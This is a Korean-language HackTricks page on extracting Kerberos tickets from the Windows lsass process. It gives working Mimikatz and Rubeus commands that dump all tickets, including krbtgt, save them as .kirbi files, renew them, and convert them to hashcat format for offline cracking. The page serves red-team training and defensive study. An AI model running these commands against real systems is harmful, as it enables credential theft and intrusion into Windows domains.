Windows์—์„œ ํ‹ฐ์ผ“ ์ˆ˜์ง‘ํ•˜๊ธฐ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Windows์—์„œ ํ‹ฐ์ผ“์€ ๋ณด์•ˆ ์ •์ฑ…์„ ์ฒ˜๋ฆฌํ•˜๋Š” lsass (Local Security Authority Subsystem Service) ํ”„๋กœ์„ธ์Šค์— ์˜ํ•ด ๊ด€๋ฆฌ๋˜๊ณ  ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํ‹ฐ์ผ“์„ ์ถ”์ถœํ•˜๋ ค๋ฉด lsass ํ”„๋กœ์„ธ์Šค์™€ ์ธํ„ฐํŽ˜์ด์Šคํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ๋น„๊ด€๋ฆฌ ์‚ฌ์šฉ์ž๋งŒ ์ž์‹ ์˜ ํ‹ฐ์ผ“์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ๊ด€๋ฆฌ์ž๋Š” ์‹œ์Šคํ…œ์˜ ๋ชจ๋“  ํ‹ฐ์ผ“์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ž‘์—…์„ ์œ„ํ•ด Mimikatz์™€ Rubeus ๋„๊ตฌ๊ฐ€ ๋„๋ฆฌ ์‚ฌ์šฉ๋˜๋ฉฐ, ๊ฐ๊ฐ ๋‹ค์–‘ํ•œ ๋ช…๋ น๊ณผ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค.

Mimikatz

Mimikatz๋Š” Windows ๋ณด์•ˆ๊ณผ ์ƒํ˜ธ์ž‘์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋‹ค๋ชฉ์  ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. ํ‹ฐ์ผ“ ์ถ”์ถœ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๋‹ค์–‘ํ•œ ๋ณด์•ˆ ๊ด€๋ จ ์ž‘์—…์—๋„ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus๋Š” Kerberos ์ƒํ˜ธ์ž‘์šฉ ๋ฐ ์กฐ์ž‘์„ ์œ„ํ•ด ํŠน๋ณ„ํžˆ ์„ค๊ณ„๋œ ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. ํ‹ฐ์ผ“ ์ถ”์ถœ ๋ฐ ์ฒ˜๋ฆฌ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๊ธฐํƒ€ Kerberos ๊ด€๋ จ ํ™œ๋™์— ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

์ด ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ๋•Œ๋Š” <BASE64_TICKET> ๋ฐ <luid>์™€ ๊ฐ™์€ ์ž๋ฆฌ ํ‘œ์‹œ์ž๋ฅผ ์‹ค์ œ Base64 ์ธ์ฝ”๋”ฉ๋œ ํ‹ฐ์ผ“ ๋ฐ ๋กœ๊ทธ์˜จ ID๋กœ ๊ฐ๊ฐ ๊ต์ฒดํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋„๊ตฌ๋Š” ํ‹ฐ์ผ“ ๊ด€๋ฆฌ ๋ฐ Windows์˜ ๋ณด์•ˆ ๋ฉ”์ปค๋‹ˆ์ฆ˜๊ณผ ์ƒํ˜ธ ์ž‘์šฉํ•˜๋Š” ๋ฐ ๊ด‘๋ฒ”์œ„ํ•œ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ